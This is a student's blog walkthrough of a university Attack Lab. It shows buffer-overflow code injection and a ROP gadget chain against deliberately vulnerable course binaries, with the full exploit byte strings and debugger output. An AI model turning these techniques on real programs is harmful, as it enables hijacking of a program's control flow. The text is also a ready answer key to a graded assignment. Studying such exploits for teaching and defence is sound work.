<!DOCTYPE html>
<html lang="en">
<head>
<link rel="stylesheet" href="https://unpkg.com/latex.css/style.min.css" />
<link rel="stylesheet" href="/assets/main.css" />
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Attack Lab</title>
<meta name="og:site_name" content="Navan Chauhan" />
<link rel="canonical" href="https://web.navan.dev/posts/2023-10-05-attack-lab.html" />
<meta name="twitter:url" content="https://web.navan.dev/posts/2023-10-05-attack-lab.html />
<meta name="og:url" content="https://web.navan.dev/posts/2023-10-05-attack-lab.html" />
<meta name="twitter:title" content="Attack Lab" />
<meta name="og:title" content="Attack Lab" />
<meta name="description" content="Walkthrough of Attack Lab Phases 1-4 for CSCI 2400 Computer Systems" />
<meta name="twitter:description" content="Walkthrough of Attack Lab Phases 1-4 for CSCI 2400 Computer Systems" />
<meta name="og:description" content="Walkthrough of Attack Lab Phases 1-4 for CSCI 2400 Computer Systems" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="shortcut icon" href="/images/favicon.png" type="image/png" />
<link rel="alternate" href="/feed.rss" type="application/rss+xml" title="Subscribe to Navan Chauhan" />
<meta name="twitter:image" content="https://web.navan.dev/images/opengraph/posts/2023-10-05-attack-lab.png" />
<meta name="og:image" content="https://web.navan.dev/images/opengraph/posts/2023-10-05-attack-lab.png" />
<meta name="google-site-verification" content="LVeSZxz-QskhbEjHxOi7-BM5dDxTg53x2TwrjFxfL0k" />
<script data-goatcounter="https://navanchauhan.goatcounter.com/count"
async src="//gc.zgo.at/count.js"></script>
<script defer data-domain="web.navan.dev" src="https://plausible.io/js/plausible.js"></script>
<link rel="manifest" href="manifest.json" />
</head>
<body>
<center><nav style="display: block;">
|
<a href="/">home</a> |
<a href="/about/">about/links</a> |
<a href="/posts/">posts</a> |
<!--<a href="/publications/">publications</a> |-->
<!--<a href="/repo/">iOS repo</a> |-->
<a href="/feed.rss">RSS Feed</a> |
</nav>
</center>
<main>
<h1>Attack Lab</h1>
<h2>Introduction</h2>
<p>Lab 3 for CSCI 2400 @ CU Boulder - Computer Systems</p>
<blockquote>
<p>This assignment involves generating a total of five attacks on two programs having different security vulnerabilities. The directions for this lab are detailed but not difficult to follow.
<cite> Attack Lab Handout </cite></p>
</blockquote>
<p>Again, I like using objdump to disassemble the code. </p>
<p><code>objdump -d ctarget > dis.txt</code></p>
<h2>Phase 1</h2>
<p>From the instructions, we know that our task is to get <code>CTARGET</code> to execute the code for <code>touch1</code> when <code>getbuf</code> executes its return statement, rather than returning to <code>test</code></p>
<p>Let us try to look into the <code>getbuf</code> from our disassembled code.</p>
<pre><code>0000000000402608 <getbuf>:
402608: 48 83 ec 18 sub $0x18,%rsp
40260c: 48 89 e7 mov %rsp,%rdi
40260f: e8 95 02 00 00 call 4028a9 <Gets>
402614: b8 01 00 00 00 mov $0x1,%eax
402619: 48 83 c4 18 add $0x18,%rsp
40261d: c3
</code></pre>
<pre><code>402608: 48 83 ec 18 sub $0x18,%rsp
</code></pre>
<p>We can see that <code>0x18</code> (hex) or <code>24</code> (decimal) bytes of buffer is allocated to <code>getbuf</code> (Since, 24 bytes are being subtracted from the stack pointer).</p>
<p>Now, since we know the buffer size we can try passing the address of the touch1 function.</p>
<div class="codehilite">
<pre><span></span><code>jxxxan@jupyter-xxxxxx8:~/lab3-attacklab-xxxxxxxxuhan/target66$<span class="w"> </span>cat<span class="w"> </span>dis.txt<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>touch1
000000000040261e<span class="w"> </span><touch1>:
</code></pre>
</div>
<p>We were told in our recitation that our system was little-endian (so the bytes will be in the reverse order). Otherwise, we can use python to check:</p>
<div class="codehilite">
<pre><span></span><code>jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$<span class="w"> </span>python<span class="w"> </span>-c<span class="w"> </span><span class="s1">'import sys; print(sys.byteorder)'</span>
little
</code></pre>
</div>
<p>We have our padding size and the function we need to call, we can write it in <code>ctarget.l1.txt</code></p>
<pre><code>00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
1e 26 40 00 00 00 00 00
</code></pre>
<div class="codehilite">
<pre><span></span><code>jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$<span class="w"> </span>./hex2raw<span class="w"> </span><<span class="w"> </span>ctarget.l1.txt<span class="w"> </span><span class="p">|</span><span class="w"> </span>./ctarget<span class="w"> </span>
Cookie:<span class="w"> </span>0x3e8dee8f
Type<span class="w"> </span>string:Touch1!:<span class="w"> </span>You<span class="w"> </span>called<span class="w"> </span>touch1<span class="o">()</span>
Valid<span class="w"> </span>solution<span class="w"> </span><span class="k">for</span><span class="w"> </span>level<span class="w"> </span><span class="m">1</span><span class="w"> </span>with<span class="w"> </span>target<span class="w"> </span>ctarget
PASS:<span class="w"> </span>Sent<span class="w"> </span>exploit<span class="w"> </span>string<span class="w"> </span>to<span class="w"> </span>server<span class="w"> </span>to<span class="w"> </span>be<span class="w"> </span>validated.
NICE<span class="w"> </span>JOB!
</code></pre>
</div>
<h2>Phase 2</h2>
<blockquote>
<p>Phase 2 involves injecting a small amount of code as part of your exploit string.
<br><br>
Within the file ctarget there is code for a function touch2 having the following C representation:
<cite>Attack Lab Handout</cite></p>
</blockquote>
<div class="codehilite">
<pre><span></span><code><span class="kt">void</span><span class="w"> </span><span class="nf">touch2</span><span class="p">(</span><span class="kt">unsigned</span><span class="w"> </span><span class="n">val</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="n">vlevel</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">2</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">val</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">cookie</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Touch2!: You called touch2(0x%.8x)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">val</span><span class="p">);</span>
<span class="w"> </span><span class="n">validate</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Misfire: You called touch2(0x%.8x)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">val</span><span class="p">);</span>
<span class="w"> </span><span class="n">fail</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre>
</div>
<blockquote>
<p>Your task is to get CTARGET to execute the code for touch2 rather than returning to test. In this case,
however, you must make it appear to touch2 as if you have passed your cookie as its argument.
<br><br>
Recall that the first argument to a function is passed in register %rdi
<cite>Attack Lab Handout</cite></p>
</blockquote>
<p>This hint tells us that we need to store the cookie in the rdi register</p>
<div class="codehilite">
<pre><span></span><code><span class="nf">movq</span><span class="w"> </span><span class="no">$0x3e8dee8f</span><span class="p">,</span><span class="nv">%rdi</span><span class="w"> </span>
<span class="no">retq</span>
</code></pre>
</div>
<p>To get the byte representation, we need to compile the code and then disassemble it.</p>
<div class="codehilite">
<pre><span></span><code>jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$<span class="w"> </span>gcc<span class="w"> </span>-c<span class="w"> </span>phase2.s<span class="w"> </span><span class="o">&&</span><span class="w"> </span>objdump<span class="w"> </span>-d<span class="w"> </span>phase2.o
phase2.s:<span class="w"> </span>Assembler<span class="w"> </span>messages:
phase2.s:<span class="w"> </span>Warning:<span class="w"> </span>end<span class="w"> </span>of<span class="w"> </span>file<span class="w"> </span>not<span class="w"> </span>at<span class="w"> </span>end<span class="w"> </span>of<span class="w"> </span>a<span class="w"> </span>line<span class="p">;</span><span class="w"> </span>newline<span class="w"> </span>inserted
phase2.o:<span class="w"> </span>file<span class="w"> </span>format<span class="w"> </span>elf64-x86-64
Disassembly<span class="w"> </span>of<span class="w"> </span>section<span class="w"> </span>.text:
<span class="m">0000000000000000</span><span class="w"> </span><.text>:
<span class="w"> </span><span class="m">0</span>:<span class="w"> </span><span class="m">48</span><span class="w"> </span>c7<span class="w"> </span>c7<span class="w"> </span>8f<span class="w"> </span>ee<span class="w"> </span>8d<span class="w"> </span>3e<span class="w"> </span>mov<span class="w"> </span><span class="nv">$0</span>x3e8dee8f,%rdi
<span class="w"> </span><span class="m">7</span>:<span class="w"> </span>c3<span class="w"> </span>ret<span class="w"> </span>
</code></pre>
</div>
<p>Thus, the byte representation for our asm code is <code>48 c7 c7 8f ee 8d 3e c3</code></p>
<p>We also need to figure out the address to the <code>%rsp</code> register. Again, looking at the <code>getbuf</code> code</p>
<pre><code>0000000000402608 <getbuf>:
402608: 48 83 ec 18 sub $0x18,%rsp
40260c: 48 89 e7 mov %rsp,%rdi
40260f: e8 95 02 00 00 call 4028a9 <Gets>
402614: b8 01 00 00 00 mov $0x1,%eax
402619: 48 83 c4 18 add $0x18,%rsp
40261d: c3 ret
</code></pre>
<p>We need to find the address of <code>%rsp</code> after calling <code><Gets></code> and sending a really long string.</p>
<p>What we are going to do now is to add a break on <code>getbuf</code>, and run the program just after it asks us to enter a string and then find the address of <code>%rsp</code></p>
<div class="codehilite">
<pre><span></span><code>jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$<span class="w"> </span>gdb<span class="w"> </span>./ctarget
GNU<span class="w"> </span>gdb<span class="w"> </span><span class="o">(</span>Ubuntu<span class="w"> </span><span class="m">12</span>.1-0ubuntu1~22.04<span class="o">)</span><span class="w"> </span><span class="m">12</span>.1
Copyright<span class="w"> </span><span class="o">(</span>C<span class="o">)</span><span class="w"> </span><span class="m">2022</span><span class="w"> </span>Free<span class="w"> </span>Software<span class="w"> </span>Foundation,<span class="w"> </span>Inc.
License<span class="w"> </span>GPLv3+:<span class="w"> </span>GNU<span class="w"> </span>GPL<span class="w"> </span>version<span class="w"> </span><span class="m">3</span><span class="w"> </span>or<span class="w"> </span>later<span class="w"> </span><http://gnu.org/licenses/gpl.html>
This<span class="w"> </span>is<span class="w"> </span>free<span class="w"> </span>software:<span class="w"> </span>you<span class="w"> </span>are<span class="w"> </span>free<span class="w"> </span>to<span class="w"> </span>change<span class="w"> </span>and<span class="w"> </span>redistribute<span class="w"> </span>it.
There<span class="w"> </span>is<span class="w"> </span>NO<span class="w"> </span>WARRANTY,<span class="w"> </span>to<span class="w"> </span>the<span class="w"> </span>extent<span class="w"> </span>permitted<span class="w"> </span>by<span class="w"> </span>law.
Type<span class="w"> </span><span class="s2">"show copying"</span><span class="w"> </span>and<span class="w"> </span><span class="s2">"show warranty"</span><span class="w"> </span><span class="k">for</span><span class="w"> </span>details.
This<span class="w"> </span>GDB<span class="w"> </span>was<span class="w"> </span>configured<span class="w"> </span>as<span class="w"> </span><span class="s2">"x86_64-linux-gnu"</span>.
Type<span class="w"> </span><span class="s2">"show configuration"</span><span class="w"> </span><span class="k">for</span><span class="w"> </span>configuration<span class="w"> </span>details.
For<span class="w"> </span>bug<span class="w"> </span>reporting<span class="w"> </span>instructions,<span class="w"> </span>please<span class="w"> </span>see:
<https://www.gnu.org/software/gdb/bugs/>.
Find<span class="w"> </span>the<span class="w"> </span>GDB<span class="w"> </span>manual<span class="w"> </span>and<span class="w"> </span>other<span class="w"> </span>documentation<span class="w"> </span>resources<span class="w"> </span>online<span class="w"> </span>at:
<span class="w"> </span><http://www.gnu.org/software/gdb/documentation/>.
For<span class="w"> </span>help,<span class="w"> </span><span class="nb">type</span><span class="w"> </span><span class="s2">"help"</span>.
Type<span class="w"> </span><span class="s2">"apropos word"</span><span class="w"> </span>to<span class="w"> </span>search<span class="w"> </span><span class="k">for</span><span class="w"> </span>commands<span class="w"> </span>related<span class="w"> </span>to<span class="w"> </span><span class="s2">"word"</span>...
Reading<span class="w"> </span>symbols<span class="w"> </span>from<span class="w"> </span>./ctarget...
<span class="o">(</span>gdb<span class="o">)</span><span class="w"> </span>b<span class="w"> </span>getbuf
Breakpoint<span class="w"> </span><span class="m">1</span><span class="w"> </span>at<span class="w"> </span>0x402608:<span class="w"> </span>file<span class="w"> </span>buf.c,<span class="w"> </span>line<span class="w"> </span><span class="m">12</span>.
<span class="o">(</span>gdb<span class="o">)</span><span class="w"> </span>run
Starting<span class="w"> </span>program:<span class="w"> </span>/home/jxxxxn/lab3-attacklab-naxxxan/target66/ctarget<span class="w"> </span>
Cookie:<span class="w"> </span>0x3e8dee8f
Breakpoint<span class="w"> </span><span class="m">1</span>,<span class="w"> </span>getbuf<span class="w"> </span><span class="o">()</span><span class="w"> </span>at<span class="w"> </span>buf.c:12
<span class="m">12</span><span class="w"> </span>buf.c:<span class="w"> </span>No<span class="w"> </span>such<span class="w"> </span>file<span class="w"> </span>or<span class="w"> </span>directory.
<span class="o">(</span>gdb<span class="o">)</span><span class="w"> </span>disas
Dump<span class="w"> </span>of<span class="w"> </span>assembler<span class="w"> </span>code<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="k">function</span><span class="w"> </span>getbuf:
<span class="o">=</span>><span class="w"> </span>0x0000000000402608<span class="w"> </span><+0>:<span class="w"> </span>sub<span class="w"> </span><span class="nv">$0</span>x18,%rsp
<span class="w"> </span>0x000000000040260c<span class="w"> </span><+4>:<span class="w"> </span>mov<span class="w"> </span>%rsp,%rdi
<span class="w"> </span>0x000000000040260f<span class="w"> </span><+7>:<span class="w"> </span>call<span class="w"> </span>0x4028a9<span class="w"> </span><Gets>
<span class="w"> </span>0x0000000000402614<span class="w"> </span><+12>:<span class="w"> </span>mov<span class="w"> </span><span class="nv">$0</span>x1,%eax
<span class="w"> </span>0x0000000000402619<span class="w"> </span><+17>:<span class="w"> </span>add<span class="w"> </span><span class="nv">$0</span>x18,%rsp
<span class="w"> </span>0x000000000040261d<span class="w"> </span><+21>:<span class="w"> </span>ret<span class="w"> </span>
End<span class="w"> </span>of<span class="w"> </span>assembler<span class="w"> </span>dump.
<span class="o">(</span>gdb<span class="o">)</span><span class="w"> </span><span class="k">until</span><span class="w"> </span>*0x402614
Type<span class="w"> </span>string:fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470<span class="w"> </span>trq378t4378gwe
getbuf<span class="w"> </span><span class="o">()</span><span class="w"> </span>at<span class="w"> </span>buf.c:15
<span class="m">15</span><span class="w"> </span><span class="k">in</span><span class="w"> </span>buf.c
<span class="o">(</span>gdb<span class="o">)</span><span class="w"> </span>x/s<span class="w"> </span><span class="nv">$rsp</span>
0x55621b40:<span class="w"> </span><span class="s2">"fnaewuilrgchneaisurcngefsiduerxgecnseriuesgcbnr7ewqdt2348dn564q03278g602365bgn34890765bqv470 trq378t4378gwe"</span>
<span class="o">(</span>gdb<span class="o">)</span>
</code></pre>
</div>
<p>So, the address for <code>%rsp</code> is <code>0x55621b40</code></p>
<p>Thus, we can set our <code>ctarget.l2.txt</code> as:</p>
<pre><code>byte representation of ASM code
padding
address of %rsp
address of touch2 function
</code></pre>
<p>To get the address of <code>touch2</code> we can run:</p>
<div class="codehilite">
<pre><span></span><code>jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$<span class="w"> </span>cat<span class="w"> </span>dis.txt<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>touch2
000000000040264e<span class="w"> </span><touch2>:
<span class="w"> </span><span class="m">402666</span>:<span class="w"> </span><span class="m">74</span><span class="w"> </span>2a<span class="w"> </span>je<span class="w"> </span><span class="m">402692</span><span class="w"> </span><touch2+0x44>
<span class="w"> </span>4026b2:<span class="w"> </span>eb<span class="w"> </span>d4<span class="w"> </span>jmp<span class="w"> </span><span class="m">402688</span><span class="w"> </span><touch2+0x3a>
</code></pre>
</div>
<pre><code>48 c7 c7 8f ee 8d 3e c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
40 1b 62 55 00 00 00 00
4e 26 b2 00 00 00 00 00
</code></pre>
<p>Do note that our required padding is 24 bytes, we are only adding 16 bytes because our asm code is 8 bytes on its own. Our goal is to have a total of 24 bytes in padding, not 8 + 24 bytes, </p>
<div class="codehilite">
<pre><span></span><code>joxxxx@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$<span class="w"> </span>./hex2raw<span class="w"> </span><<span class="w"> </span>ctarget.l2.txt<span class="w"> </span><span class="p">|</span><span class="w"> </span>./ctarget<span class="w"> </span>
Cookie:<span class="w"> </span>0x3e8dee8f
Type<span class="w"> </span>string:Touch2!:<span class="w"> </span>You<span class="w"> </span>called<span class="w"> </span>touch2<span class="o">(</span>0x3e8dee8f<span class="o">)</span>
Valid<span class="w"> </span>solution<span class="w"> </span><span class="k">for</span><span class="w"> </span>level<span class="w"> </span><span class="m">2</span><span class="w"> </span>with<span class="w"> </span>target<span class="w"> </span>ctarget
PASS:<span class="w"> </span>Sent<span class="w"> </span>exploit<span class="w"> </span>string<span class="w"> </span>to<span class="w"> </span>server<span class="w"> </span>to<span class="w"> </span>be<span class="w"> </span>validated.
NICE<span class="w"> </span>JOB!
</code></pre>
</div>
<h2>Phase 3</h2>
<blockquote>
<p>Phase 3 also involves a code injection attack, but passing a string as argument.
<br><br>
You will need to include a string representation of your cookie in your exploit string. The string should
consist of the eight hexadecimal digits (ordered from most to least significant) without a leading “0x.”
<br><br>
Your injected code should set register %rdi to the address of this string
<br><br>
When functions hexmatch and strncmp are called, they push data onto the stack, overwriting
portions of memory that held the buffer used by getbuf. As a result, you will need to be careful
where you place the string representation of your cookie.
<cite>Attack Lab Handout</cite></p>
</blockquote>
<p>Because <code>hexmatch</code> and <code>strncmp</code> might overwrite the buffer allocated for <code>getbuf</code> we will try to store the data after the function <code>touch3</code> itself.</p>
<p>The rationale is simple: by the time our payload is executed, we will be setting <code>%rdi</code> to point to the cookie. Placing the cookie after <code>touch3</code> function ensures that it will not be overwritten by the function calls. It also means that we can calculate the address of the cookie with relative ease, based on the known offsets.</p>
<p>=> The total bytes before the cookie = Buffer (0x18 in our case) + Return Address of %rsp (8 bytes) + Touch 3 (8 Bytes) = 0x18 + 8 + 8 = 28 (hex)</p>
<ul>
<li>Return Address (8 Bytes): Since in a 64 bit system the return address is always 8 bytes, by overwriting this address, we redirect the function to jump to our desired location upon returning (e.g. the beginning of the <code>touch3</code> function)</li>
<li>Touch 3 (8 bytes): The address of the <code>touch3</code> function is 8 bytes long.</li>
</ul>
<p>We can use our address for <code>%rsp</code> from phase 2, and simply add <code>0x28</code> to it.</p>
<p>=> <code>0x55621b40</code> + <code>0x28</code> = <code>0x55621B68</code></p>
<p>Again, let us get the binary representation for the ASM code:</p>
<div class="codehilite">
<pre><span></span><code><span class="nf">movq</span><span class="w"> </span><span class="no">$0x55621B68</span><span class="p">,</span><span class="w"> </span><span class="nv">%rdi</span>
<span class="nf">retq</span>
</code></pre>
</div>
<div class="codehilite">
<pre><span></span><code>jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$<span class="w"> </span>gcc<span class="w"> </span>-c<span class="w"> </span>phase3.s<span class="w"> </span><span class="o">&&</span><span class="w"> </span>objdump<span class="w"> </span>-d<span class="w"> </span>phase3.o
phase3.s:<span class="w"> </span>Assembler<span class="w"> </span>messages:
phase3.s:<span class="w"> </span>Warning:<span class="w"> </span>end<span class="w"> </span>of<span class="w"> </span>file<span class="w"> </span>not<span class="w"> </span>at<span class="w"> </span>end<span class="w"> </span>of<span class="w"> </span>a<span class="w"> </span>line<span class="p">;</span><span class="w"> </span>newline<span class="w"> </span>inserted
phase3.o:<span class="w"> </span>file<span class="w"> </span>format<span class="w"> </span>elf64-x86-64
Disassembly<span class="w"> </span>of<span class="w"> </span>section<span class="w"> </span>.text:
<span class="m">0000000000000000</span><span class="w"> </span><.text>:
<span class="w"> </span><span class="m">0</span>:<span class="w"> </span><span class="m">48</span><span class="w"> </span>c7<span class="w"> </span>c7<span class="w"> </span><span class="m">68</span><span class="w"> </span>1b<span class="w"> </span><span class="m">62</span><span class="w"> </span><span class="m">55</span><span class="w"> </span>mov<span class="w"> </span><span class="nv">$0</span>x55621b68,%rdi
<span class="w"> </span><span class="m">7</span>:<span class="w"> </span>c3<span class="w"> </span>ret
</code></pre>
</div>
<p>Thus, our answer is going to be in the form:</p>
<pre><code>asm code
padding
return address / %rsp
touch3 address
cookie string
</code></pre>
<p>To quickly get the address for <code>touch3</code></p>
<div class="codehilite">
<pre><span></span><code>jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$<span class="w"> </span>cat<span class="w"> </span>dis.txt<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>touch3
<span class="m">0000000000402763</span><span class="w"> </span><touch3>:
<span class="w"> </span><span class="m">402781</span>:<span class="w"> </span><span class="m">74</span><span class="w"> </span>2d<span class="w"> </span>je<span class="w"> </span>4027b0<span class="w"> </span><touch3+0x4d>
<span class="w"> </span>4027d3:<span class="w"> </span>eb<span class="w"> </span>d1<span class="w"> </span>jmp<span class="w"> </span>4027a6<span class="w"> </span><touch3+0x43>
</code></pre>
</div>
<p>We need to use an ASCII to Hex converter to convert the cookie string into hex.</p>
<div class="codehilite">
<pre><span></span><code>jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$<span class="w"> </span><span class="nb">echo</span><span class="w"> </span>-n<span class="w"> </span>3e8dee8f<span class="w"> </span><span class="p">|</span><span class="w"> </span>xxd<span class="w"> </span>-p
<span class="m">3365386465653866</span>
</code></pre>
</div>
<p>Thus, our cookie string representation is <code>33 65 38 64 65 65 38 66</code></p>
<pre><code>48 c7 c7 68 1B 62 55 c3
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
40 1b 62 55 00 00 00 00
63 27 40 00 00 00 00 00
33 65 38 64 65 65 38 66
</code></pre>
<div class="codehilite">
<pre><span></span><code>jxxxxn@jupyter-naxxxx88:~/lab3-attacklab-naxxxan/target66$<span class="w"> </span>./hex2raw<span class="w"> </span><<span class="w"> </span>ctarget.l3.txt<span class="w"> </span><span class="p">|</span><span class="w"> </span>./ctarget<span class="w"> </span>
Cookie:<span class="w"> </span>0x3e8dee8f
Type<span class="w"> </span>string:Touch3!:<span class="w"> </span>You<span class="w"> </span>called<span class="w"> </span>touch3<span class="o">(</span><span class="s2">"3e8dee8f"</span><span class="o">)</span>
Valid<span class="w"> </span>solution<span class="w"> </span><span class="k">for</span><span class="w"> </span>level<span class="w"> </span><span class="m">3</span><span class="w"> </span>with<span class="w"> </span>target<span class="w"> </span>ctarget
PASS:<span class="w"> </span>Sent<span class="w"> </span>exploit<span class="w"> </span>string<span class="w"> </span>to<span class="w"> </span>server<span class="w"> </span>to<span class="w"> </span>be<span class="w"> </span>validated.
NICE<span class="w"> </span>JOB!
</code></pre>
</div>
<p>Phases 1-3 Complete.</p>
<h2>Phase 4</h2>
<blockquote>
<p>For Phase 4, you will repeat the attack of Phase 2, but do so on program RTARGET using gadgets from your
gadget farm. You can construct your solution using gadgets consisting of the following instruction types,
and using only the first eight x86-64 registers (%rax–%rdi).
* movq
* popq
* ret
* nop
<br><br>
All the gadgets you need can be found in the region of the code for rtarget demarcated by the
functions start<em>farm and mid</em>farm
<br><br>
You can do this attack with just two gadgets
<br><br>
When a gadget uses a popq instruction, it will pop data from the stack. As a result, your exploit
string will contain a combination of gadget addresses and data.
<cite>Attack Lab Handout</cite></p>
</blockquote>
<p>Let us check if we can find <code>popq %rdi</code> between <code>start_farm</code> and <code>end_farm</code></p>
<p>The way a normal person would find the hex representation <code>58</code> to be between <code>start_farm</code> and <code>end_farm</code> is to find the line numbers for both and
then search between those lines. But, what if you don't want to move away from the terminal?</p>
<p>Assuming, the disassembled code for <code>rtarget</code> is stored in <code>dis2.txt</code> (<code>objdump -d rtarget > dis2.txt</code>)</p>
<pre><code>jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ sed -n '/start_farm/,/end_farm/p' dis2.txt | grep -n2 " 58"
16-000000000040281f <getval_373>:
17- 40281f: f3 0f 1e fa endbr64
18: 402823: b8 d3 f5 c2 58 mov $0x58c2f5d3,%eax
19- 402828: c3 ret
20-
--
26-0000000000402834 <setval_212>:
27- 402834: f3 0f 1e fa endbr64
28: 402838: c7 07 58 90 c3 92 movl $0x92c39058,(%rdi)
29- 40283e: c3 ret
30-
--
41-0000000000402854 <setval_479>:
42- 402854: f3 0f 1e fa endbr64
43: 402858: c7 07 58 c7 7f 61 movl $0x617fc758,(%rdi)
44- 40285e: c3 ret
45-
</code></pre>
<p>If we were to pick the first one as our gadget, the instruction address is <code>0x402823</code>, but to get to the instruction <code>58</code> we need to add 4 bytes:</p>
<p><code>=> Gadget address = 0x402823 + 0x4 = 0x402827</code></p>
<p>The PDF already provides the next gadget we are supposed to look for <code>48 89 c7</code></p>
<pre><code>jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$ sed -n '/start_farm/,/end_farm/p' dis2.txt | grep -n2 "48 89 c7"
11-0000000000402814 <setval_253>:
12- 402814: f3 0f 1e fa endbr64
13: 402818: c7 07 48 89 c7 94 movl $0x94c78948,(%rdi)
14- 40281e: c3 ret
15-
--
31-000000000040283f <getval_424>:
32- 40283f: f3 0f 1e fa endbr64
33: 402843: b8 48 89 c7 c3 mov $0xc3c78948,%eax
34- 402848: c3 ret
35-
36-0000000000402849 <setval_417>:
37- 402849: f3 0f 1e fa endbr64
38: 40284d: c7 07 48 89 c7 90 movl $0x90c78948,(%rdi)
39- 402853: c3 ret
40-
jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$
</code></pre>
<p>We cannot use the first match because it is followed by <code>0x94</code> instead of <code>c3</code>, either of the next two matches will work (<code>0x90</code> is <code>nop</code> and it does nothing but increment the program counter by 1)</p>
<p>Again, we have to account for the offset.</p>
<p>Taking <code>0x402843</code> we need to add just 1 byte. </p>
<p><code>=> 0x402843 + 1 = 0x402844</code></p>
<p>Our answer for this file is going to be:</p>
<pre><code>padding
gadget1
cookie
gadget2
touch2
</code></pre>
<div class="codehilite">
<pre><span></span><code>jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$<span class="w"> </span>cat<span class="w"> </span>dis2.txt<span class="w"> </span><span class="p">|</span><span class="w"> </span>grep<span class="w"> </span>touch2
000000000040264e<span class="w"> </span><touch2>:
<span class="w"> </span><span class="m">402666</span>:<span class="w"> </span><span class="m">74</span><span class="w"> </span>2a<span class="w"> </span>je<span class="w"> </span><span class="m">402692</span><span class="w"> </span><touch2+0x44>
<span class="w"> </span>4026b2:<span class="w"> </span>eb<span class="w"> </span>d4<span class="w"> </span>jmp<span class="w"> </span><span class="m">402688</span><span class="w"> </span><touch2+0x3a>
</code></pre>
</div>
<pre><code>00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
27 28 40 00 00 00 00 00
8f ee 8d 3e 00 00 00 00
44 28 40 00 00 00 00 00
4e 26 40 00 00 00 00 00
</code></pre>
<div class="codehilite">
<pre><span></span><code>jovyan@jupyter-nach6988:~/lab3-attacklab-navanchauhan/target66$<span class="w"> </span>./hex2raw<span class="w"> </span><<span class="w"> </span>./rtarget.l2.txt<span class="w"> </span><span class="p">|</span><span class="w"> </span>./rtarget<span class="w"> </span>
Cookie:<span class="w"> </span>0x3e8dee8f
Type<span class="w"> </span>string:Touch2!:<span class="w"> </span>You<span class="w"> </span>called<span class="w"> </span>touch2<span class="o">(</span>0x3e8dee8f<span class="o">)</span>
Valid<span class="w"> </span>solution<span class="w"> </span><span class="k">for</span><span class="w"> </span>level<span class="w"> </span><span class="m">2</span><span class="w"> </span>with<span class="w"> </span>target<span class="w"> </span>rtarget
PASS:<span class="w"> </span>Sent<span class="w"> </span>exploit<span class="w"> </span>string<span class="w"> </span>to<span class="w"> </span>server<span class="w"> </span>to<span class="w"> </span>be<span class="w"> </span>validated.
NICE<span class="w"> </span>JOB!
</code></pre>
</div>
<blockquote>If you have scrolled this far, consider subscribing to my mailing list <a href="https://listmonk.navan.dev/subscription/form">here.</a> You can subscribe to either a specific type of post you are interested in, or subscribe to everything with the "Everything" list.</blockquote>
<script data-isso="https://comments.navan.dev/"
src="https://comments.navan.dev/js/embed.min.js"></script>
<section id="isso-thread">
<noscript>Javascript needs to be activated to view comments.</noscript>
</section>
</main>
<script src="assets/manup.min.js"></script>
<script src="/pwabuilder-sw-register.js"></script>
</body>
</html>